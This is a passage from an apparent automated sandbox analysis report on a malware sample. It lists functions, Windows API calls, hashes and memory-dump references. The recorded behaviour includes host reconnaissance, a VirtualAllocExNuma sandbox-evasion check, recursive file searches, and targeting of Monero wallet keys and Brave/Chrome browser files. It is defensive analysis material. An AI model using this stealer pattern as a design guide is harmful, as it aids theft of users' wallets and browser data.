                        • Opcode Fuzzy Hash: 02aec151727f0717b79ff18b72d1df55b30a5aac269b64e7f2d07252383d3a01
                        • Instruction Fuzzy Hash: 44113C30900008ABCB54FF68DD92BED7378AF91340F804558F81B4B592EF34AB06CAD2
                        Function 00991110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0099112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00991132
                        • ExitProcess.KERNEL32 ref: 00991143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 70d0dbb31e6bb83e35bdf463931a4687d2d128b263e373fcb899983962d3d891
                        • Instruction ID: 1550f99736317fe650722de57782946b43b73b2a595b1c21c6c58dd2ffc03f1c
                        • Opcode Fuzzy Hash: 70d0dbb31e6bb83e35bdf463931a4687d2d128b263e373fcb899983962d3d891
                        • Instruction Fuzzy Hash: 7CE0E670946348FFEB106BA59C1EB09B778AB04B01F104155F709771D0DAB52A409699
                        Function 009910A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009910B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009910F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c99710adb8fe62c90c671d2eaba37eeda75b0d187978dfe5239c82d60170d17a
                        • Instruction ID: 3b6d3a70812d803d1f43f38e410739bb01f98028fbbf016a0a8f9d08ce260070
                        • Opcode Fuzzy Hash: c99710adb8fe62c90c671d2eaba37eeda75b0d187978dfe5239c82d60170d17a
                        • Instruction Fuzzy Hash: D9F0E271641208BBEB149AA8AC59FAFB7ECE705B15F300848F904E3280D9729E00DAA0
                        Function 00991190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A7910
                          • Part of subcall function 009A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009A7917
                          • Part of subcall function 009A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009A792F
                          • Part of subcall function 009A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009911B7), ref: 009A7880
                          • Part of subcall function 009A7850: RtlAllocateHeap.NTDLL(00000000), ref: 009A7887
                          • Part of subcall function 009A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009A789F
                        • ExitProcess.KERNEL32 ref: 009911C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 42c9b7504b4fcb9b96c66eb75ac40002f265daef786c99b5d2dbc19761e23482
                        • Instruction ID: 1953c7359c4e75a2ceb12dc0846323137979b481800e71ce0d6f3d4eeffb3b71
                        • Opcode Fuzzy Hash: 42c9b7504b4fcb9b96c66eb75ac40002f265daef786c99b5d2dbc19761e23482
                        • Instruction Fuzzy Hash: 42E05BB5E1530263CE1073F8BC5BB2B779CAB55349F040425FA05D3102FE29F80086E6

                        Non-executed Functions

                        Function 009A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 009A38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A38E3
                        • lstrcat.KERNEL32(?,?), ref: 009A3935
                        • StrCmpCA.SHLWAPI(?,009B0F70), ref: 009A3947
                        • StrCmpCA.SHLWAPI(?,009B0F74), ref: 009A395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A3C67
                        • FindClose.KERNEL32(000000FF), ref: 009A3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 5ccfab3da8a5efad30a247f8446fba0c0f286670eec8195b9d2f40288b40189a
                        • Instruction ID: e3da88a30d1eadc3c550d7de330b18fb66453c149c113b617d8b5271d898950f
                        • Opcode Fuzzy Hash: 5ccfab3da8a5efad30a247f8446fba0c0f286670eec8195b9d2f40288b40189a
                        • Instruction Fuzzy Hash: 97A120B1A012189BDB24DFA4DC95FFEB379BB89300F048589B50D97141EB759B84CFA2
                        Function 0099BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,009B0B32,009B0B2B,00000000,?,?,?,009B13F4,009B0B2A), ref: 0099BEF5
                        • StrCmpCA.SHLWAPI(?,009B13F8), ref: 0099BF4D
                        • StrCmpCA.SHLWAPI(?,009B13FC), ref: 0099BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0099C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 2d40654a0af87fb8f0fb9a7a414d7f4316a5e32daeb858239af250ff3a68b6e5
                        • Instruction ID: a1407d2b74147b794156eeb246d61d2a0d698881b9cee24cb40f4cdb0c7d9468
                        • Opcode Fuzzy Hash: 2d40654a0af87fb8f0fb9a7a414d7f4316a5e32daeb858239af250ff3a68b6e5
                        • Instruction Fuzzy Hash: 1D425F72900108ABCF54FB64DD96FEE737DABC5300F408558B90A96191EF34AB49CBE2
                        Function 009A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 009A492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A4943
                        • StrCmpCA.SHLWAPI(?,009B0FDC), ref: 009A4971
                        • StrCmpCA.SHLWAPI(?,009B0FE0), ref: 009A4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A4B7D
                        • FindClose.KERNEL32(000000FF), ref: 009A4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: d6d8791b199aca9c940b10fd40b9d8e519bdc563a96839996ae66f33c81ddfe4
                        • Instruction ID: f5028afff8e57cffcb615b1940994945a04a064eb43c7acbdad8fb7de535514b
                        • Opcode Fuzzy Hash: d6d8791b199aca9c940b10fd40b9d8e519bdc563a96839996ae66f33c81ddfe4
                        • Instruction Fuzzy Hash: 226141B1900218ABCB20EBA4DC55FEAB37CBBC9700F044589B50996141FF75EB85CFA1
                        Function 009A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009A4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A4587
                        • wsprintfA.USER32 ref: 009A45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A45BD
                        • StrCmpCA.SHLWAPI(?,009B0FC4), ref: 009A45EB
                        • StrCmpCA.SHLWAPI(?,009B0FC8), ref: 009A4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A468B
                        • FindClose.KERNEL32(000000FF), ref: 009A46A0
                        • lstrcat.KERNEL32(?,015BE390), ref: 009A46C5
                        • lstrcat.KERNEL32(?,015BD398), ref: 009A46D8
                        • lstrlen.KERNEL32(?), ref: 009A46E5
                        • lstrlen.KERNEL32(?), ref: 009A46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 24adf1f3dd9afe00dcbaf31cc34775ece5e3d132e9579b4dd30e1592598c954a
                        • Instruction ID: 6e424e5c9076d7a17280bc95e3a8519f39e796d10e8cbac99bbdb855a5cccb31
                        • Opcode Fuzzy Hash: 24adf1f3dd9afe00dcbaf31cc34775ece5e3d132e9579b4dd30e1592598c954a
                        • Instruction Fuzzy Hash: F65157B19102189BCB24EBB0DC99FEEB37CAB99300F404589F60997150EF759B84CF92
                        Function 009A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 009A3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 009A3EDA
                        • StrCmpCA.SHLWAPI(?,009B0FAC), ref: 009A3F08
                        • StrCmpCA.SHLWAPI(?,009B0FB0), ref: 009A3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009A406C
                        • FindClose.KERNEL32(000000FF), ref: 009A4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 704e02576ad8c0cb9c4873fd505e767d1dfc5d3e1470f16b685a0d55d719b957
                        • Instruction ID: 40b4ded616546e49659311e3337ed20c298f177b127b32cd63bb83651bb0a251
                        • Opcode Fuzzy Hash: 704e02576ad8c0cb9c4873fd505e767d1dfc5d3e1470f16b685a0d55d719b957
                        • Instruction Fuzzy Hash: E05134B2900218ABCB24EBB4DC95FEAB37CBB85300F404589B65996150EF75EB858F91
                        Function 0099ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0099ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0099ED55
                        • StrCmpCA.SHLWAPI(?,009B1538), ref: 0099EDAB
                        • StrCmpCA.SHLWAPI(?,009B153C), ref: 0099EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0099F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 527e723d8837e66a36ba0a79b3e99283f04bd61621d45eedcb8824b87d164800
                        • Instruction ID: 509c2300d15c9bfcf6766c2727e85ea150bb55788b68159291edc5c338b8247d
                        • Opcode Fuzzy Hash: 527e723d8837e66a36ba0a79b3e99283f04bd61621d45eedcb8824b87d164800
                        • Instruction Fuzzy Hash: 68E1BD729111189BDB94EB64DC52FEE7338AFD5300F4045A9B50B62092EF346F8ACF96
                        Function 0099F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B15B8,009B0D96), ref: 0099F71E
                        • StrCmpCA.SHLWAPI(?,009B15BC), ref: 0099F76F
                        • StrCmpCA.SHLWAPI(?,009B15C0), ref: 0099F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0099FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
